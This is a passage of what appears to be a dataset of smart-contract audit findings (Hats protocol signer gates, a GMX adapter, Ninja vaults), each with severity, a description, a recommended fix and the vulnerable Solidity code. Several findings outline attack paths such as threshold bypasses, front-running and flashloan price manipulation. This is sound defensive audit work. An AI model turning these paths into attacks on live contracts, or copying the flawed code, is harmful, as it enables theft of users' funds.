including `mint()`, `burn()`, and `swap()`.",Wrap the operation around an unchecked{} block so that when the variable overflows it loops back to 0 instead of reverting.,,```\\n uint256 timeElapsed = blockTimestamp - blockTimestampLast;\\n // overflow is desired\\n if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n reserve0CumulativeLast += _reserve0 * timeElapsed;\\n reserve1CumulativeLast += _reserve1 * timeElapsed;\\n }\\n```\\n +createGauge4Pool() lacks proper checks and/or access control,medium,"The function createGauge4Pool() can be called by anybody at any time and is used to create a Gauge for a special pool, the 4pool. It takes 5 parameters as inputs:\\n```\\n function createGauge4pool(\\n address _4pool,\\n address _dai,\\n address _usdc,\\n address _usdt,\\n address _cash\\n ) external returns (address) {\\n```\\n\\nNone of the parameters are properly sanitized, meaning _dai, _usdc, _usdt, _cash could be any whitelisted token and not necessarily DAI, USDC, USDT, and cash while _4pool could be any custom contract, including a malicious one. The function also sets the variable FOUR_POOL_GAUGE_ADDRESS to the newly created gauge, overwriting the previous value.","Make the function only callable by an admin, and if it can be called multiple times, turn the variable FOUR_POOL_GAUGE_ADDRESS to a mapping from address to boolean to support multiple 4 pools.",,"```\\n function createGauge4pool(\\n address _4pool,\\n address _dai,\\n address _usdc,\\n address _usdt,\\n address _cash\\n ) external returns (address) {\\n```\\n" +The logic in _calculateClaim() can leave some tokens locked and waste gas,low,"The function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. To do so, this code is executed in a loop for each week from the current timestamp to the last claim (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nWhen the if condition is not met two things happen:\\nAn amount of emissions that was supposed to be distributed ((balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor])) is skipped, meaning it will stay locked in the contract.\\nThe function `_calculateClaim()` will loop for the maximum number of times (50), because weekCursor is not increased, wasting users' gas.",When the if condition is not met burn the tokens that were supposed to be distributed and exit the loop. Since the non-distributed tokens would stay locked it's not strictly necessary to burn them.,,```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n +More than one hat of the same hatId can be assigned to a user,high,"Hats are minted internally using `_mintHat()`.\\n```\\n /// @notice Internal call to mint a Hat token to a wearer\\n /// @dev Unsafe if called when `_wearer` has a non-zero balance of `_hatId`\\n /// @param _wearer The wearer of the Hat and the recipient of the newly minted token\\n /// @param _hatId The id of the Hat to mint\\n function _mintHat(address _wearer, uint256 _hatId) internal {\\n unchecked {\\n // should not overflow since `mintHat` enforces max balance of 1\\n _balanceOf[_wearer][_hatId] = 1;\\n // increment Hat supply counter\\n // should not overflow given AllHatsWorn check in `mintHat` ++_hats[_hatId].supply;\\n }\\n emit TransferSingle(msg.sender, address(0), _wearer, _hatId, 1);\\n }\\n```\\n\\nAs documentation states, it is unsafe if _wearer already has the hatId. However, this could easily be the case when called from `mintHat()`.\\n```\\n function mintHat(uint256 _hatId, address _wearer) public returns (bool) {\\n Hat memory hat = _hats[_hatId];\\n if (hat.maxSupply == 0) revert HatDoesNotExist(_hatId);\\n // only the wearer of a hat's admin Hat can mint it\\n _checkAdmin(_hatId);\\n if (hat.supply >= hat.maxSupply) {\\n revert AllHatsWorn(_hatId);\\n }\\n if (isWearerOfHat(_wearer, _hatId)) {\\n revert AlreadyWearingHat(_wearer, _hatId);\\n }\\n _mintHat(_wearer, _hatId);\\n return true;\\n }\\n```\\n\\nThe function validates _wearer doesn't currently wear the hat, but its balance could still be over 0, if the hat is currently toggled off or the wearer is not eligible. The impact is that the hat supply is forever spent, while nobody actually received the hat. This could be used maliciously or occur by accident. When the hat is immutable, the max supply can never be corrected for this leak. It could be used to guarantee no additional, unfriendly hats can be minted to maintain permanent power.","Instead of checking if user currently wears the hat, check if its balance is over 0.",,"```\\n /// @notice Internal call to mint a Hat token to a wearer\\n /// @dev Unsafe if called when `_wearer` has a non-zero balance of `_hatId`\\n /// @param _wearer The wearer of the Hat and the recipient of the newly minted token\\n /// @param _hatId The id of the Hat to mint\\n function _mintHat(address _wearer, uint256 _hatId) internal {\\n unchecked {\\n // should not overflow since `mintHat` enforces max balance of 1\\n _balanceOf[_wearer][_hatId] = 1;\\n // increment Hat supply counter\\n // should not overflow given AllHatsWorn check in `mintHat` ++_hats[_hatId].supply;\\n }\\n emit TransferSingle(msg.sender, address(0), _wearer, _hatId, 1);\\n }\\n```\\n" +TXs can be executed by less than the minimum required signatures,high,"In HatsSignerGateBase, `checkTransaction()` is the function called by the Gnosis safe to approve the transaction. Several checks are in place.\\n```\\n uint256 safeOwnerCount = safe.getOwners().length;\\n if (safeOwnerCount < minThreshold) {\\n revert BelowMinThreshold(minThreshold, safeOwnerCount);\\n }\\n```\\n\\n```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n\\nThe first check is that the number of owners registered on the safe is at least minThreshold. The second check is that the number of valid signatures (wearers of relevant hats) is not below the safe's threshold. However, it turns out these requirements are not sufficient. A possible situation is that there are plenty of owners registered, but currently most do not wear a hat. `reconcileSignerCount()` could be called to reduce the safe's threshold to the current validSigCount, which can be below minThreshold. That would make both the first and second check succeed. However, minThreshold is defined to be the smallest number of signers that must come together to make a TX. The result is that a single signer could execute a TX on the safe, if the other signers are not wearers of hats (for example, their toggle has been temporarily set off in the case of multi-hat signer gate.","Add another check in `checkTransaction()`, which states that validSigCount >= minThreshold.",,"```\\n uint256 safeOwnerCount = safe.getOwners().length;\\n if (safeOwnerCount < minThreshold) {\\n revert BelowMinThreshold(minThreshold, safeOwnerCount);\\n }\\n```\\n" +Target signature threshold can be bypassed leading to minority TXs,high,"`checkTransaction()` is the enforcer of the HSG logic, making sure signers are wearers of hats and so on. The check below makes sure sufficient hat wearers signed the TX:\\n```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n\\nThe issue is that the safe's threshold is not guaranteed to be up to date. For example, initially there were 5 delegated signers. At some point, three lost eligibility. `reconcileSignerCount()` is called to update the safe's threshold to now have 2 signers. At a later point, the three signers which lost eligibility regained it. At this point, the threshold is still two, but there are 5 valid signers, so if targetThreshold is not below 5, they should all sign for a TX to be executed. That is not the case, as the old threshold is used. There are various scenarios which surface the lack of synchronization between the wearer status and safe's stored threshold.",Call `reconcileSignerCount()` before the validation code in `checkTransaction()`.,,"```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n" +maxSigners can be bypassed,high,"maxSigners is specified when creating an HSG and is left constant. It is enforced in two ways -targetThreshold may never be set above it, and new signers cannot register to the HSG when the signer count reached maxSigners. Below is the implementation code in HatsSignerGate.\\n```\\n function claimSigner() public virtual {\\n if (signerCount == maxSigners) {\\n revert MaxSignersReached();\\n }\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n _grantSigner(msg.sender);\\n }\\n```\\n\\nAn issue that arises is that this doesn't actually limit the number of registered signers. Indeed, signerCount is a variable that can fluctuate when wearers lose eligibility or a hat is inactive. At this point, `reconcileSignerCount()` can be called to update the signerCount to the current valid wearer count. A simple attack which achieves unlimited claims is as follows:\\nAssume maxSigners = 10\\n10 signers claim their spot, so signerCount is maxed out\\nA signer misbehaves, loses eligibility and the hat.\\nreconcile() is called, so signerCount is updated to 9\\nA new signer claims, making signerCount = 10\\nThe malicious signer behaves nicely and regains the hat.\\nreconcile() is called again, making signerCount = 11\\nAt this point, any eligible hat wearer can claim their hat, easily overrunning the maxSigners restriction.","The root cause is that users which registered but lose their hat are still stored in the safe's owners array, meaning they can always get re-introduced and bump the signerCount. Instead of checking the signerCount, a better idea would be to compare with the list of owners saved on the safe. If there are owners that are no longer holders, `removeSigner()` can be called to vacate space for new signers.",,```\\n function claimSigner() public virtual {\\n if (signerCount == maxSigners) {\\n revert MaxSignersReached();\\n }\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n _grantSigner(msg.sender);\\n }\\n```\\n +Attacker can DOS minting of new top hats in low-fee chains,medium,"In Hats protocol, anyone can be assigned a top hat via the `mintTopHat()` function. The top hats are structured with top 32 bits acting as a domain ID, and the lower 224 bits are cleared. There are therefore up to 2^32 = ~ 4 billion top hats. Once they are all consumed, `mintTopHat()` will always fail:\\n```\\n // uint32 lastTopHatId will overflow in brackets\\n topHatId = uint256(++lastTopHatId) << 224;\\n```\\n\\nThis behavior exposes the project to a DOS vector, where an attacker can mint 4 billion top hats in a loop and make the function unusable, forcing a redeploy of Hats protocol. This is unrealistic on ETH mainnet due to gas consumption, but definitely achievable on the cheaper L2 networks. As the project will be deployed on a large variety of EVM blockchains, this poses a significant risk.",Require a non-refundable deposit fee (paid in native token) when minting a top hat. Price it so that consuming the 32-bit space will be impossible. This can also serve as a revenue stream for the Hats project.,,```\\n // uint32 lastTopHatId will overflow in brackets\\n topHatId = uint256(++lastTopHatId) << 224;\\n```\\n +Linking of hat trees can freeze hat operations,medium,"Hats support tree-linking, where hats from one node link to the first level of a different domain. This way, the amount of levels for the linked-to tree increases by the linked-from level count. This is generally fine, however lack of checking of the new total level introduces severe risks.\\n```\\n /// @notice Identifies the level a given hat in its hat tree\\n /// @param _hatId the id of the hat in question\\n /// @return level (0 to type(uint8).max)\\n function getHatLevel(uint256 _hatId) public view returns (uint8) {\\n```\\n\\nThe `getHatLevel()` function can only return up to level 255. It is used by the `checkAdmin()` call used in many of the critical functions in the Hats contract. Therefore, if for example, 17 hat domains are joined together in the most stretched way possible, It would result in a correct hat level of 271, making this calculation revert:\\n```\\n if (treeAdmin != 0) {\\n return 1 + uint8(i) + getHatLevel(treeAdmin);\\n }\\n```\\n\\nThe impact is that intentional or accidental linking that creates too many levels would freeze the higher hat levels from any interaction with the contract.","It is recommended to add a check in `_linkTopHatToTree()`, that the new accumulated level can fit in uint8. Another option would be to change the maximum level type to uint32.",,```\\n /// @notice Identifies the level a given hat in its hat tree\\n /// @param _hatId the id of the hat in question\\n /// @return level (0 to type(uint8).max)\\n function getHatLevel(uint256 _hatId) public view returns (uint8) {\\n```\\n +Attacker can make a signer gate creation fail,medium,"DAOs can deploy a HSG using `deployHatsSignerGateAndSafe()` or deployMultiHatsSignerGateAndSafe().The parameters are encoded and passed to moduleProxyFactory.deployModule():\\n```\\n bytes memory initializeParams = abi.encode(_ownerHatId, _signersHatId, _safe, hatsAddress, _minThreshold, \\n _targetThreshold, _maxSigners, version );\\n hsg = moduleProxyFactory.deployModule(hatsSignerGateSingleton, abi.encodeWithSignature(""setUp(bytes)"", \\n initializeParams), _saltNonce );\\n```\\n\\nThis function will call createProxy():\\n```\\n proxy = createProxy( masterCopy, keccak256(abi.encodePacked(keccak256(initializer), saltNonce)) );\\n```\\n\\nThe second parameter is the generated salt, which is created from the initializer and passed saltNonce. Finally `createProxy()` will use CREATE2 to create the contract:\\n```\\n function createProxy(address target, bytes32 salt) internal returns (address result)\\n {\\n if (address(target) == address(0)) revert ZeroAddress(target);\\n if (address(target).code.length == 0) revert \\n TargetHasNoCode(target);\\n bytes memory deployment = abi.encodePacked(\\n hex""602d8060093d393df3363d3d373d3d3d363d73"", target, hex""5af43d82803e903d91602b57fd5bf3"" );\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n result := create2(0, add(deployment, 0x20), \\n mload(deployment), salt)\\n }\\n if (result == address(0)) revert TakenAddress(result);\\n }\\n```\\n\\nAn issue could be that an attacker can frontrun the creation TX with their own creation request, with the same parameters. This would create the exact address created by the CREATE2 call, since the parameters and therefore the final salt will be the same. When the victim's transaction would be executed, the address is non-empty so the EVM would reject its creation. This would result in a bad UX for a user, who thinks the creation did not succeed. The result contract would still be usable, but would be hard to track as it was created in another TX.",Use an ever-increasing nonce counter to guarantee unique contract addresses.,,"```\\n bytes memory initializeParams = abi.encode(_ownerHatId, _signersHatId, _safe, hatsAddress, _minThreshold, \\n _targetThreshold, _maxSigners, version );\\n hsg = moduleProxyFactory.deployModule(hatsSignerGateSingleton, abi.encodeWithSignature(""setUp(bytes)"", \\n initializeParams), _saltNonce );\\n```\\n" +Signers can backdoor the safe to execute any transaction in the future without consensus,medium,"The function `checkAfterExecution()` is called by the safe after signer's request TX was executed (and authorized). It mainly checks that the linkage between the safe and the HSG has not been compromised.\\n```\\n function checkAfterExecution(bytes32, bool) external override {\\n if (abi.decode(StorageAccessible(address(safe)).getStorageAt(uint256(GUARD_STORAGE_SLOT), 1), (address))\\n != address(this)) \\n {\\n revert CannotDisableThisGuard(address(this));\\n }\\n if (!IAvatar(address(safe)).isModuleEnabled(address(this))) {\\n revert CannotDisableProtectedModules(address(this));\\n }\\n if (safe.getThreshold() != _correctThreshold()) {\\n revert SignersCannotChangeThreshold();\\n }\\n // leave checked to catch underflows triggered by re-erntry\\n attempts\\n --guardEntries;\\n }\\n```\\n\\nHowever, it is missing a check that no new modules have been introduced to the safe. When modules execute TXs on a Gnosis safe, the guard safety callbacks do not get called. As a result, any new module introduced is free to execute whatever it wishes on the safe. It constitutes a serious backdoor threat and undermines the HSG security model.","Check that no new modules have been introduced to the safe, using the `getModulesPaginated()` utility.",,"```\\n function checkAfterExecution(bytes32, bool) external override {\\n if (abi.decode(StorageAccessible(address(safe)).getStorageAt(uint256(GUARD_STORAGE_SLOT), 1), (address))\\n != address(this)) \\n {\\n revert CannotDisableThisGuard(address(this));\\n }\\n if (!IAvatar(address(safe)).isModuleEnabled(address(this))) {\\n revert CannotDisableProtectedModules(address(this));\\n }\\n if (safe.getThreshold() != _correctThreshold()) {\\n revert SignersCannotChangeThreshold();\\n }\\n // leave checked to catch underflows triggered by re-erntry\\n attempts\\n --guardEntries;\\n }\\n```\\n" +createHat does not detect MAX_LEVEL admin correctly,low,"In `createHat()`, the contract checks user is not minting hats for the lowest hat tier:\\n```\\n function createHat( uint256 _admin, string memory _details, uint32 _maxSupply, address _eligibility,\\n address _toggle, bool _mutable, string memory _imageURI) \\n public returns (uint256 newHatId) {\\n if (uint8(_admin) > 0) {\\n revert MaxLevelsReached();\\n }\\n ….\\n }\\n```\\n\\nThe issue is that it does not check for max level correctly, as it looks only at the lowest 8 bits. Each level is composed of 16 bits, so ID xx00 would pass this check. Fortunately, although the check is passed, the function will revert later. The call to `getNextId(_admin)` will return 0 for max-level admin, and _checkAdmin(0) is guaranteed to fail. However, the check should still be fixed as it is not exploitable only by chance.",Change the conversion to uint16.,,"```\\n function createHat( uint256 _admin, string memory _details, uint32 _maxSupply, address _eligibility,\\n address _toggle, bool _mutable, string memory _imageURI) \\n public returns (uint256 newHatId) {\\n if (uint8(_admin) > 0) {\\n revert MaxLevelsReached();\\n }\\n ….\\n }\\n```\\n" +Incorrect imageURI is returned for hats in certain cases,low,"Function `getImageURIForHat()` should return the most relevant imageURI for the requested hatId. It will iterate backwards from the current level down to level 0, and return an image if it exists for that level.\\n```\\n function getImageURIForHat(uint256 _hatId) public view returns (string memory) {\\n // check _hatId first to potentially avoid the `getHatLevel` call\\n Hat memory hat = _hats[_hatId];\\n string memory imageURI = hat.imageURI; // save 1 SLOAD\\n // if _hatId has an imageURI, we return it\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // otherwise, we check its branch of admins\\n uint256 level = getHatLevel(_hatId);\\n // but first we check if _hatId is a tophat, in which case we fall back to the global image uri\\n if (level == 0) return baseImageURI;\\n // otherwise, we check each of its admins for a valid imageURI\\n uint256 id;\\n // already checked at `level` above, so we start the loop at `level - 1`\\n for (uint256 i = level - 1; i > 0;) {\\n id = getAdminAtLevel(_hatId, uint8(i));\\n hat = _hats[id];\\n imageURI = hat.imageURI;\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // should not underflow given stopping condition is > 0\\n unchecked {\\n --i;\\n }\\n }\\n // if none of _hatId's admins has an imageURI of its own, we \\n again fall back to the global image uri\\n return baseImageURI;\\n }\\n```\\n\\nIt can be observed that the loop body will not run for level 0. When the loop is finished, the code just returns the baseImageURI, which is a Hats-level fallback, rather than top hat level fallback. As a result, the image displayed will not be correct when querying for a level above 0, when all levels except level 0 have no registered image.","Before returning the baseImageURI, check if level 0 admin has a registered image.",,"```\\n function getImageURIForHat(uint256 _hatId) public view returns (string memory) {\\n // check _hatId first to potentially avoid the `getHatLevel` call\\n Hat memory hat = _hats[_hatId];\\n string memory imageURI = hat.imageURI; // save 1 SLOAD\\n // if _hatId has an imageURI, we return it\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // otherwise, we check its branch of admins\\n uint256 level = getHatLevel(_hatId);\\n // but first we check if _hatId is a tophat, in which case we fall back to the global image uri\\n if (level == 0) return baseImageURI;\\n // otherwise, we check each of its admins for a valid imageURI\\n uint256 id;\\n // already checked at `level` above, so we start the loop at `level - 1`\\n for (uint256 i = level - 1; i > 0;) {\\n id = getAdminAtLevel(_hatId, uint8(i));\\n hat = _hats[id];\\n imageURI = hat.imageURI;\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // should not underflow given stopping condition is > 0\\n unchecked {\\n --i;\\n }\\n }\\n // if none of _hatId's admins has an imageURI of its own, we \\n again fall back to the global image uri\\n return baseImageURI;\\n }\\n```\\n" +Fetching of hat status may fail due to lack of input sanitization,low,"The functions `_isActive()` and `_isEligible()` are used by `balanceOf()` and other functions, so they should not ever revert. However, they perform ABI decoding from external inputs.\\n```\\n function _isActive(Hat memory _hat, uint256 _hatId) internal view returns (bool) {\\n bytes memory data = \\n abi.encodeWithSignature(""getHatStatus(uint256)"", _hatId);\\n (bool success, bytes memory returndata) = \\n _hat.toggle.staticcall(data);\\n if (success && returndata.length > 0) {\\n return abi.decode(returndata, (bool));\\n } else {\\n return _getHatStatus(_hat);\\n }\\n }\\n```\\n\\nIf toggle returns invalid return data (whether malicious or by accident), `abi.decode()` would revert causing the entire function to revert.",Wrap the decoding operation for both affected functions in a try/catch statement. Fall back to the `_getHatStatus()` result if necessary. Checking that returndata size is correct is not enough as bool encoding must be 64-bit encoded 0 or 1.,,"```\\n function _isActive(Hat memory _hat, uint256 _hatId) internal view returns (bool) {\\n bytes memory data = \\n abi.encodeWithSignature(""getHatStatus(uint256)"", _hatId);\\n (bool success, bytes memory returndata) = \\n _hat.toggle.staticcall(data);\\n if (success && returndata.length > 0) {\\n return abi.decode(returndata, (bool));\\n } else {\\n return _getHatStatus(_hat);\\n }\\n }\\n```\\n" +Attacker can take over GMXAdapter implementation contract,low,"GMXAdapter inherits from BaseExchangeAdapter. It is an implementation contract for a transparent proxy and has the following initializer:\\n```\\n function initialize() external initializer {\\n __Ownable_init();\\n }\\n```\\n\\nTherefore, an attacker can call initialize() on the implementation contract and become the owner. At this point they can do just about anything to this contract, but it has no impact on the proxy as it is using separate storage. If there was a delegatecall coded in GMXAdapter, attacker could have used it to call an attacker's contract and execute the SELFDESTRUCT opcode, killing the implementation. With no implementation, the proxy itself would not be functional until it is updated to a new implementation. It is ill-advised to allow anyone to have control over implementation contracts as future upgrades may make the attack surface exploitable.",The standard approach is to call from the constructor the _disableInitializers() from Open Zeppelin's Initializable module,,```\\n function initialize() external initializer {\\n __Ownable_init();\\n }\\n```\\n +disordered fee calculated causes collateral changes to be inaccurate,high,"`_increasePosition()` changes the Hedger's GMX position by sizeDelta amount and collateralDelta collateral. There are two collateralDelta corrections - one for swap fees and one for position fees. Since the swap fee depends on up-to-date collateralDelta, it's important to calculate it after the position fee, contrary to the current state. In practice, it may lead to the leverage ratio being higher than intended as collateralDelta sent to GMX is lower than it should be.\\n```\\n if (isLong) {\\n uint swapFeeBP = getSwapFeeBP(isLong, true, collateralDelta);\\n collateralDelta = (collateralDelta * (BASIS_POINTS_DIVISOR + swapFeeBP)) / BASIS_POINTS_DIVISOR;\\n }\\n // add margin fee\\n // when we increase position, fee always got deducted from collateral\\n collateralDelta += _getPositionFee(currentPos.size, sizeDelta, currentPos.entryFundingRate);\\n```\\n",Flip the order of `getSwapFeeBP()` and `_getPositionFee()`.,,"```\\n if (isLong) {\\n uint swapFeeBP = getSwapFeeBP(isLong, true, collateralDelta);\\n collateralDelta = (collateralDelta * (BASIS_POINTS_DIVISOR + swapFeeBP)) / BASIS_POINTS_DIVISOR;\\n }\\n // add margin fee\\n // when we increase position, fee always got deducted from collateral\\n collateralDelta += _getPositionFee(currentPos.size, sizeDelta, currentPos.entryFundingRate);\\n```\\n" +small LP providers may be unable to withdraw their deposits,medium,"In LiquidityPool's initiateWithdraw(), it's required that withdrawn value is above a minimum parameter, or that withdrawn tokens is above the minimum parameter.\\n```\\n if (withdrawalValue < lpParams.minDepositWithdraw && \\n amountLiquidityToken < lpParams.minDepositWithdraw) {\\n revert MinimumWithdrawNotMet(address(this), withdrawalValue, lpParams.minDepositWithdraw);\\n }\\n```\\n\\nThe issue is that minDepositWithdraw is measured in dollars while amountLiquidityToken is LP tokens. The intention was that if LP tokens lost value and a previous deposit is now worth less than minDepositWithdraw, it would still be withdrawable. However, the current implementation doesn't check for that correctly, since the LP to dollar exchange rate at deposit time is not known, and is practically being hardcoded as 1:1 here. The impact is that users may not be able to withdraw LP with the token amount that was above the minimum at deposit time, or vice versa",Consider calculating an average exchange rate at which users have minted and use it to verify withdrawal amount is satisfactory.,,"```\\n if (withdrawalValue < lpParams.minDepositWithdraw && \\n amountLiquidityToken < lpParams.minDepositWithdraw) {\\n revert MinimumWithdrawNotMet(address(this), withdrawalValue, lpParams.minDepositWithdraw);\\n }\\n```\\n" +"base to quote swaps trust GMX-provided minPrice and maxPrice to be correct, which may be manipulated",medium,"exchangeFromExactBase() in GMXAdapter converts an amount of base to quote. It implements slippage protection by using the GMX vault's getMinPrice() and getMaxPrice() utilities. However, such protection is insufficient because GMX prices may be manipulated. Indeed, GMX supports “AMM pricing” mode where quotes are calculated from Uniswap reserves. A possible attack would be to drive up the base token (e.g. ETH) price, sell a large ETH amount to the GMXAdapter, and repay the flashloan used for manipulation. exchangeFromExactBase() is attacker-reachable from LiquidityPool's exchangeBase().\\n```\\n uint tokenInPrice = _getMinPrice(address(baseAsset));\\n uint tokenOutPrice = _getMaxPrice(address(quoteAsset));\\n // rest of code\\n uint minOut = tokenInPrice\\n .multiplyDecimal(marketPricingParams[_optionMarket].minReturnPercent)\\n .multiplyDecimal(_amountBase)\\n .divideDecimal(tokenOutPrice);\\n```\\n","Verify `getMinPrice()`, `getMinPrice()` outputs are close to Chainlink-provided prices as done in `getSpotPriceForMarket()`.",,```\\n uint tokenInPrice = _getMinPrice(address(baseAsset));\\n uint tokenOutPrice = _getMaxPrice(address(quoteAsset));\\n // rest of code\\n uint minOut = tokenInPrice\\n .multiplyDecimal(marketPricingParams[_optionMarket].minReturnPercent)\\n .multiplyDecimal(_amountBase)\\n .divideDecimal(tokenOutPrice);\\n```\\n +recoverFunds() does not handle popular ERC20 tokens like BNB,medium,"recoverFunds() is used for recovery in case of mistakenly-sent tokens. However, it uses unsafe transfer to send tokens back, which will not support 100s of non-compatible ERC20 tokens. Therefore it is likely unsupported tokens will be unrecoverable.\\n```\\n if (token == quoteAsset || token == baseAsset || token == weth) {\\n revert CannotRecoverRestrictedToken(address(this));\\n }\\n token.transfer(recipient, token.balanceOf(address(this)));\\n```\\n",Use Open Zeppelin's SafeERC20 encapsulation of ERC20 transfer functions.,,"```\\n if (token == quoteAsset || token == baseAsset || token == weth) {\\n revert CannotRecoverRestrictedToken(address(this));\\n }\\n token.transfer(recipient, token.balanceOf(address(this)));\\n```\\n" +setPositionRouter leaks approval to previous positionRouter,low,"positionRouter is used to change GMX positions in GMXFuturesPoolHedger. It can be replaced by a new router if GMX redeploys, for example if a bug is found or the previous one is hacked. The new positionRouter receives approval from the contract. However, approval to the previous positionRouter is not revoked.\\n```\\n function setPositionRouter(IPositionRouter _positionRouter) external onlyOwner {\\n positionRouter = _positionRouter;\\n router.approvePlugin(address(positionRouter));\\n emit PositionRouterSet(_positionRouter);\\n }\\n```\\n\\nA number of unlikely, yet dire scenarios could occur.",Use router.denyPlugin() to remove privileges from the previous positionRouter.,,```\\n function setPositionRouter(IPositionRouter _positionRouter) external onlyOwner {\\n positionRouter = _positionRouter;\\n router.approvePlugin(address(positionRouter));\\n emit PositionRouterSet(_positionRouter);\\n }\\n```\\n +PoolHedger can receive ETH directly from anyone,low,"A `receive()` function has been added to GMXFuturesPoolHedger, so that it is able to receive ETH from GMX as request refunds. However, it is not advisable to have an open `receive()` function if it is not necessary. Users may wrongly send ETH directly to PoolHedger and lose it forever.\\n```\\n receive() external payable {}\\n```\\n","Add a msg.sender check in the receive() function, and make sure sender is positionRouter.",,```\\n receive() external payable {}\\n```\\n +Attacker can freeze profit withdrawals from V3 vaults,high,"Users of Ninja can use Vault's `withdrawProfit()` to withdraw profits. It starts with the following check:\\n```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n\\nIf attacker can front-run user's `withdrawProfit()` TX and set lastProfitTime to block.timestamp, they would effectively freeze the user's yield. That is indeed possible using the Vault paired strategy's `harvest()` function. It is permissionless and calls `_harvestCore()`. The attack path is shown in bold.\\n```\\n function harvest() external override whenNotPaused returns (uint256 callerFee) {\\n require(lastHarvestTimestamp != block.timestamp);\\n uint256 harvestSeconds = lastHarvestTimestamp > 0 ? block.timestamp \\n - lastHarvestTimestamp : 0;\\n lastHarvestTimestamp = block.timestamp;\\n uint256 sentToVault;\\n uint256 underlyingTokenCount;\\n (callerFee, underlyingTokenCount, sentToVault) = _harvestCore();\\n emit StrategyHarvest(msg.sender, underlyingTokenCount, \\n harvestSeconds, sentToVault);\\n }\\n```\\n\\n```\\n function _harvestCore() internal override returns (uint256 callerFee, uint256 underlyingTokenCount, uint256 sentToVault)\\n {\\n IMasterChef(SPOOKY_SWAP_FARM_V2).deposit(POOL_ID, 0);\\n _swapFarmEmissionTokens();\\n callerFee = _chargeFees();\\n underlyingTokenCount = balanceOf();\\n sentToVault = _sendYieldToVault();\\n } \\n```\\n\\n```\\n function _sendYieldToVault() internal returns (uint256 sentToVault) {\\n sentToVault = IERC20Upgradeable(USDC).balanceOf(address(this));\\n if (sentToVault > 0) {\\n IERC20Upgradeable(USDC).approve(vault, sentToVault);\\n IVault(vault).depositProfitTokenForUsers(sentToVault);\\n }\\n }\\n```\\n\\n```\\n function depositProfitTokenForUsers(uint256 _amount) external nonReentrant {\\n if (_amount == 0) {\\n revert NYProfitTakingVault__ZeroAmount();\\n }\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n if (msg.sender != strategy) {\\n revert NYProfitTakingVault__OnlyStrategy();\\n }\\n uint256 totalShares = totalSupply();\\n if (totalShares == 0) {\\n lastProfitTime = block.timestamp;\\n return;\\n }\\n accProfitTokenPerShare += ((_amount * PROFIT_TOKEN_PER_SHARE_PRECISION) / totalShares);\\n lastProfitTime = block.timestamp;\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n }\\n```\\n",Do not prevent profit withdrawals during lastProfitTime block.,,```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n +Lack of child rewarder reserves could lead to freeze of funds,high,"In ComplexRewarder.sol, `onReward()` is used to distribute rewards for previous time period, using the complex rewarder and any child rewarders. If the complex rewarder does not have enough tokens to hand out the reward, it correctly stores the rewards owed in storage. However, child rewarded will attempt to hand out the reward and may revert:\\n```\\n function onReward(uint _pid, address _user, address _to, uint, uint _amt) external override onlyParent nonReentrant {\\n PoolInfo memory pool = updatePool(_pid);\\n if (pool.lastRewardTime == 0) return;\\n UserInfo storage user = userInfo[_pid][_user];\\n uint pending;\\n if (user.amount > 0) {\\n pending = ((user.amount * pool.accRewardPerShare) / ACC_TOKEN_PRECISION) - user.rewardDebt;\\n rewardToken.safeTransfer(_to, pending);\\n }\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / \\n ACC_TOKEN_PRECISION;\\n emit LogOnReward(_user, _pid, pending, _to);\\n }\\n```\\n\\nImportantly, if the child rewarder fails, the parent's `onReward()` reverts too:\\n```\\n uint len = childrenRewarders.length();\\n for (uint i = 0; i < len; ) {\\n IRewarder(childrenRewarders.at(i)).onReward(_pid, _user, _to, 0, \\n _amt);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nIn the worst-case scenario, this will lead the user's `withdraw()` call to V3 Vault, to revert.","Introduce sufficient exception handling in the CompexRewarder.sol contract, so that `onReward()` would never fail.",,"```\\n function onReward(uint _pid, address _user, address _to, uint, uint _amt) external override onlyParent nonReentrant {\\n PoolInfo memory pool = updatePool(_pid);\\n if (pool.lastRewardTime == 0) return;\\n UserInfo storage user = userInfo[_pid][_user];\\n uint pending;\\n if (user.amount > 0) {\\n pending = ((user.amount * pool.accRewardPerShare) / 